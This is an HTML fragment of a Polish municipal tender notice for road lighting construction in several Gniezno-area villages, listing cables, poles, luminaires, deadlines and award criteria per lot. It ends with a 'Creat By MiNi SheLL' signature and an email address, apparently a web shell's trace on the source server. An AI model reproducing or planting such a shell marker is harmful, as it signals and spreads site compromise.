                      data zakończenia: 30/09/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Okres gwarancji i rękojmi </td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>9
                  
                <b>Nazwa: </b>Budowa oświetlenia drogowego w m. Pyszczyn dz. 27/50, 34/2<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>    Przedmiotem niniejszej inwestycji jest budowa oświetlenia drogowego  w miejscowości Pszczyn                      dz. 27/50, 34/2    gmina Gniezno.


Zakres prac przy budowie oświetlenia drogowego : 
Ustalenia zawarte w niniejszej specyfikacji dotyczą zasad prowadzenia robót związanych z dobudowa oświetlenia ulicznego w miejscowości Pszczyn dz. nr 26/2, 27/50, 34/2 gmina Gniezno. Specyfikacje należy rozpatrywać łącznie z przedmiarem robót, projektem budowlanym i wydanymi pozwoleniami                   i uzgodnieniami
Projektuje się:
- wykopu 545 m
- budowę linii kablowej oświetleniowej kablem typu YAKY 4x 25 mm2 o długości całkowitej 612 m
- budowę 4 slupów oświetleniowych ośmiokątnych typu BETA 7/1/1,5
- budowę 7 slupów oświetleniowych ośmiokątnych typu BETA 5/1/1
- budowę 11 tabliczki bezpiecznikowej TB1
- budowę 4 opraw oświetleniowych SGS 203 i źródłem światła SON T Plus 100W
- budowę 7 opraw oświetleniowych SGS 203 i źródłem  światła SON T Plus 70W
- budowę 545 m uziomu z bednarki FeZn 25x4 mm
- budowę 22 kpl. uziomów GALMAR 1,5 m
- ułożenie rury ochronnej 10 m AROT DVK 75
- przycisk rury ochronnej 16 m AROT SRS 75
- wykonanie pomiarów elektrycznych
W zakresie prac tymczasowych i towarzyszących niezbędnych do wykonania robót podstawowych wchodzą:
-geodezyjne wytyczenie trasy sieci kablowej i posadowienia slupów
-inwentaryzacja powykonawcza
-przywrócenie terenu do stanu pierwotnego po zakończeniu robót związanych z budowa oświetlenia
-odtworzenie nawierzchni dróg i dojść
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45316110-9<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 30/09/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Okres gwaranji i rękojmi </td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>10
                  
                <b>Nazwa: </b>Budowa oświetleniadrogowego w m. Wełnica os. Wichrowe Wzgórza<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>    Przedmiotem niniejszej inwestycji jest budowa oświetlenia drogowego  w miejscowości Wełnica oś. Wichrowe Wzgórza , gmina Gniezno.


Zakres prac przy budowie oświetlenia drogowego : 
   Ustalenia zawarte w niniejszej specyfikacji dotyczą zasad prowadzenia robót związanych z dobudową oświetlenia ulicznego w miejscowości Wełnica os. Wichrowe Wzgórze dz. nr 105/32, gmina Gniezno.
Specyfikację należy rozpatrywać łącznie z przedmiarem robót, projektem budowlanym i wydanymi pozwoleniami i uzgodnieniami
Projektuje się:
- wykopu 240 m
- budowę linii kablowej oświetleniowej kablem typu YAKY 4x 35 mm2 o długości całkowitej 27 m
- budowę linii kablowej oświetleniowej kablem typu YAKY 4x 25 mm2 o długości całkowitej 261 m
- budowę szafki oświetleniowej SO
- budowę 6 słupów oświetleniowych ośmiokątnych typu BETA 6/1/1,5
- budowę 6 tabliczek bezpiecznikowych TB
- budowę 6 opraw Schreder typu AMPERA MINI 5102 500mA 16L26W
- budowę 240 m uziomu z bednarki FeZn 25x4 mm
- budowę 7 kpl. uziomów GALMAR 4,5 m
- ułożenie rury ochronnej 29 m AROT DVK 75
- wykonanie pomiarów elektrycznych
W zakresie prac tymczasowych i towarzyszących niezbędnych do wykonania robót podstawowych wchodzą:
-geodezyjne wytyczenie trasy sieci kablowej i posadowienia słupów
-inwentaryzacja powykonawcza
-przywrócenie terenu do stanu pierwotnego po zakończeniu robót związanych z budową oświetlenia
-odtworzenie nawierzchni dróg i dojść

<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45316110-9<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 30/09/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Termin gwarancji i rękojmi </td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>11
                  
                <b>Nazwa: </b>Budowa oświetlenia drogowego w m. Wełnica os. rzeczne i w Dolinie <br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>    Przedmiotem niniejszej inwestycji jest budowa oświetlenia drogowego  w miejscowości Wełnica os. Rzeczne i w Dolinie , gmina Gniezno.
Zakres prac przy budowie oświetlenia drogowego : 
Ustalenia zawarte w niniejszej specyfikacji dotyczą zasad prowadzenia robót związanych z
dobudową oświetlenia ulicznego w miejscowości Wełnica os. Rzeczne, os. w Dolinie dz. nr 285, 296, 159/14, 158/6, 159/4, 158/1, gmina Gniezno. Specyfikację należy rozpatrywać łącznie z przedmiarem robót, projektem budowlanym i wydanymi pozwoleniami i uzgodnieniami
Projektuje się:
- wykopu 289 m
- budowę linii kablowej oświetleniowej kablem typu YAKY 4x 25 mm2 o dł. całk. 327 m
- budowę 6 słupów oświetleniowych ośmiokątnych typu BETA 6/1/1,5
- budowę 6 tabliczek bezpiecznikowych TB
- budowę 6 opraw Schreder typu Ampera Mini 5102 16L26W z uchwytem montażowym 60
- montaż 1 mufy rozgałęźnej typu JLZR4
- budowę 289 m uziomu z bednarki FeZn 25x4 mm
- budowę 6 kpl. uziomów GALMAR 4,5 m
- ułożenie rury ochronnej 42 m AROT DVK 75
- wykonanie pomiarów elektrycznych
   W zakresie prac tymczasowych i towarzyszących niezbędnych do wykonania robót podstawowych wchodzą:
-geodezyjne wytyczenie trasy sieci kablowej i posadowienia słupów
-inwentaryzacja powykonawcza
-przywrócenie terenu do stanu pierwotnego po zakończeniu robót związanych z budową oświetlenia
-odtworzenie nawierzchni dróg i dojść
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45316110-9<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 30/09/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>okres gwarancji i rękomi </td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>12
                  
                <b>Nazwa: </b>Buowa oświetlenia drgowego w m.Wełnica os. Pogodne, Strumykowe<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>    Przedmiotem niniejszej inwestycji jest budowa oświetlenia drogowego  w miejscowości Wełnica os. Pogodne i Strumykowe , gmina Gniezno.

Zakres prac przy budowie oświetlenia drogowego : 
   Ustalenia zawarte w niniejszej specyfikacji dotyczą zasad prowadzenia robót związanych z dobudową oświetlenia ulicznego w miejscowości Wełnica os. Pogodne, Strumykowe dz. nr 285, 156, 271, 265, gmina Gniezno. Specyfikację należy rozpatrywać łącznie z przedmiarem robót, projektem budowlanym                            i wydanymi pozwoleniami i uzgodnieniami
Projektuje się:
- wykopu 352 m
- budowę linii kablowej oświetleniowej kablem typu YAKY 4x 35 mm2 o dł. całk. 5 m
- budowę linii kablowej oświetleniowej kablem typu YAKY 4x 25 mm2 o dł. całk. 405 m
- budowę szafki oświetleniowej SO
- budowę 8 słupów oświetleniowych ośmiokątnych typu BETA 6/1/1,5
- budowę 1 słupa oświetleniowego ośmiokątnego typu BETA 6/1/1
- budowę 9 tabliczek bezpiecznikowych TB
- budowę 9 opraw Schreder typu Ampera Mini 5102 16L26W z uchwytem montażowym 60
- budowę 352 m uziomu z bednarki FeZn 25x4 mm
- budowę 10 kpl. uziomów GALMAR 4,5 m
- ułożenie rury ochronnej 62 m AROT DVK 75
- wykonanie pomiarów elektrycznych
W zakresie prac tymczasowych i towarzyszących niezbędnych do wykonania robót podstawowych wchodzą:
-geodezyjne wytyczenie trasy sieci kablowej i posadowienia słupów
-inwentaryzacja powykonawcza
-przywrócenie terenu do stanu pierwotnego po zakończeniu robót związanych z budową oświetlenia
-odtworzenie nawierzchni dróg i dojść
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45316110-9<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 30/09/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>kres gwaran i rękojmi </td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>13
                  
                <b>Nazwa: </b>Budowa oświetlenia drogowego w m. Szczytniki Duchowne dz. 77, 76/4<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przedmiotem niniejszej inwestycji jest budowa oświetlenia drogowego  w miejscowości Szczytniki Duchowne dz. 77, 76/4  , gmina Gniezno.

Zakres prac przy budowie oświetlenia drogowego : 
Ustalenia zawarte w niniejszej specyfikacji dotyczą zasad prowadzenia robót związanych z
dobudową oświetlenia ulicznego w miejscowości Szczytniki Duchowne dz. nr 77, 76/4,
gmina Gniezno.
Specyfikację należy rozpatrywać łącznie z przedmiarem robót, projektem budowlanym i
wydanymi pozwoleniami i uzgodnieniami
Projektuje się:
- wykopu 56 m
- budowę linii kablowej oświetleniowej kablem typu YKY 2x 10 mm2 o dł. całkowitej 5 m
- budowę linii kablowej oświetleniowej kablem typu YAKY 4x 25 mm2 o dł. całkowitej 67 m
- budowę szafki oświetleniowej SO1 wg rys. E3
- budowę 1 słupa oświetleniowego ośmiokątnego typu BETA 7/1/1
- budowę 1 słupa oświetleniowego ośmiokątnego typu BETA 7/1/1,5
- budowę 2 tabliczek bezpiecznikowych TB
- budowę 2 opraw Schreder typu Ampera Mini 5102 16L36W
- budowę 56 m uziomu z bednarki FeZn 25x4 mm
- budowę 3 kpl. uziomów GALMAR 4,5 m
- ułożenie rury ochronnej AROT DVK 75 o dł. 1 m
- wykonanie pomiarów elektrycznych
W zakresie prac tymczasowych i towarzyszących niezbędnych do wykonania robót podstawowych wchodzą:
-geodezyjne wytyczenie trasy sieci kablowej i posadowienia słupów
-inwentaryzacja powykonawcza
-przywrócenie terenu do stanu pierwotnego po zakończeniu robót związanych z budową oświetlenia
-odtworzenie nawierzchni dróg i dojść
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45316110-9<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 30/09/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Okres gwarancji i rękojmi </td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com